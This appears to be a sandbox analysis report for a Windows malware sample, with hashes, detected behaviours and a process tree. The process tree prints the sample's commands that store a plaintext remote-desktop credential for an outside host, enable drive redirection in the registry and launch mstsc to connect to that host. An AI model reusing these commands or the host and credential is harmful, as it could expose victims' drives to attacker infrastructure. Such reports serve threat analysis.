Overview

overview

7

Static

static

3

ec18438e11...42.exe

windows7-x64

6

ec18438e11...42.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    93s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/11/2024, 19:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ec18438e11d9d6f16ace03083b1ab1da390b239fe546c7b7ea90b662c6353842.exe

  • Size

    360KB

  • MD5

    97f227d150f83ef61cb4024997c6221b

  • SHA1

    ea2351466bf6211e81b794c5bc81f136d5579910

  • SHA256

    ec18438e11d9d6f16ace03083b1ab1da390b239fe546c7b7ea90b662c6353842

  • SHA512

    d21341b2dc5ec00fc61e6850b0448b5e270380f9292dca7bed226cada0c5f115a8d3300d1aaa370c572676ee320aa6038dee1914660b37e7593b3150b256b37a

  • SSDEEP

    6144:7ldk1cWQRNTBzGWGP7J/peuA2WguS8if1DAtZoXdc7JCwufTrX:7cv0NT5xg/peuPxOs1DqdifT7

Score
7/10
discovery

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ec18438e11d9d6f16ace03083b1ab1da390b239fe546c7b7ea90b662c6353842.exe
    "C:\Users\Admin\AppData\Local\Temp\ec18438e11d9d6f16ace03083b1ab1da390b239fe546c7b7ea90b662c6353842.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3960
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\72FD.tmp\72FE.tmp\72FF.bat C:\Users\Admin\AppData\Local\Temp\ec18438e11d9d6f16ace03083b1ab1da390b239fe546c7b7ea90b662c6353842.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4992
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 1
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:4304
      • C:\Windows\system32\cmdkey.exe
        cmdkey /del:TERMSRV/cs.igst.vip
        3⤵
          PID:2424
        • C:\Windows\system32\cmdkey.exe
          cmdkey /add:TERMSRV/cs.igst.vip /user:cs.igst.vip\wxwyuser /pass:qaf~dx@wR2xo82
          3⤵
            PID:2932
          • C:\Windows\system32\reg.exe
            Reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\LocalDevices" /v cs.igst.vip /t REG_DWORD /d "77" /f
            3⤵
              PID:4676
            • C:\Windows\system32\PING.EXE
              ping 127.0.0.1 -n 2
              3⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:1784
            • C:\Windows\system32\mstsc.exe
              mstsc "C:\Users\Admin\AppData\Roaming\borlndmm.dll" /v cs.igst.vip:2006 /f
              3⤵
                PID:5008
              • C:\Windows\system32\PING.EXE
                ping 127.0.0.1 -n 4
                3⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:4024
          • C:\Windows\System32\mstsc.exe
            C:\Windows\System32\mstsc.exe -Embedding
            1⤵
            • Enumerates connected drives
            • Checks SCSI registry key(s)
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            PID:1388

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\72FD.tmp\72FE.tmp\72FF.bat
            Filesize

            51KB

            MD5

            9057894a449b0a756f9184ef29ca93c4

            SHA1

            962509d372d82d946f43196be68cc594bab88863

            SHA256

            f7f9feeced9c1247410f5de421287b5039ae8cb6a81dcc74347e1ba6227778a1

            SHA512

            937e22d660f73759ac64ecf36641a2555df4dad40716e9b558368ccd4bcf65f8a7a59e30e64aeea7d421bcc5c8f24fc2a3899b12a2af6308ad0366bc1afcd8b5

            Download Submit

          • C:\Users\Admin\AppData\Roaming\borlndmm.dll
            Filesize

            223B

            MD5

            acd130fcd6ead7933d4115449320c0b3

            SHA1

            9f71de7ad69627bfa6f38d36c284ff3173c28f4f

            SHA256

            d48defd27e3e82b585164b83970a91727b7b26db40bc500a509fb262b2acbf12

            SHA512

            d8d9ce74e24c8de9cc119f92354da7fefcc796201e15ea983428492c7593909e3809a64a94c0c7ebc2ffda33339ea3e83f1b3e03ba5fac0595c10c71d775d6ca

            Download Submit